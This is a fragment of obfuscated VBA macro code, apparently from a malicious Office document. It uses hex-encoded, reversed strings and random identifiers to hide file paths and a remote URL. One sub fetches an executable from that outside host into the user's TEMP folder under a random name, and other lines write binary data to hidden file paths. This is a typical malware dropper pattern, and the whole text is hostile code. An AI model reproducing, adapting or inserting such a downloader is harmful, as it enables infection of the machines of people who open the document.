Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6268727077696F7366767677677470777372746467746862717070647374776D676F6E7869786C706769686D64777272")) For Binary As #21343
Put #21343, , okpbralvtqqvgomzpuetnydrzjbykxnphvrdgdbcrblwwknw
Close #21343
iprbpupajrxovkzgyxiukavaovuqjuedisewjvhosarairzq:
GoTo tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf
Dim tcbsngjahhrhgbagbjxnpuptlsigwallfgbolukfwaspdzis As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("756B6169796D6B656765656A61767079646F6E6D616C6E78656F737A6D6B6467616465676E6C6A68787A6B61786D6F71")) For Binary As #61689
Put #61689, , tcbsngjahhrhgbagbjxnpuptlsigwallfgbolukfwaspdzis
Close #61689
tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf:
     
End Function
Sub TFCVDJEJBJJ()
    OJFXJUFZDBX StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6578652E312F736567616D692F6F722E646172612D6473702F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
End Sub

Public Function trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy(ByVal cuvibyucfbvYCy As String) As String
  Dim oiuytevdfb4bf       As Long
  For oiuytevdfb4bf = 1 To Len(cuvibyucfbvYCy) Step 2
  trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy = trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy & Chr$(Val("&H" & Mid$(cuvibyucfbvYCy, oiuytevdfb4bf, 2)))
  Next oiuytevdfb4bf
 End Function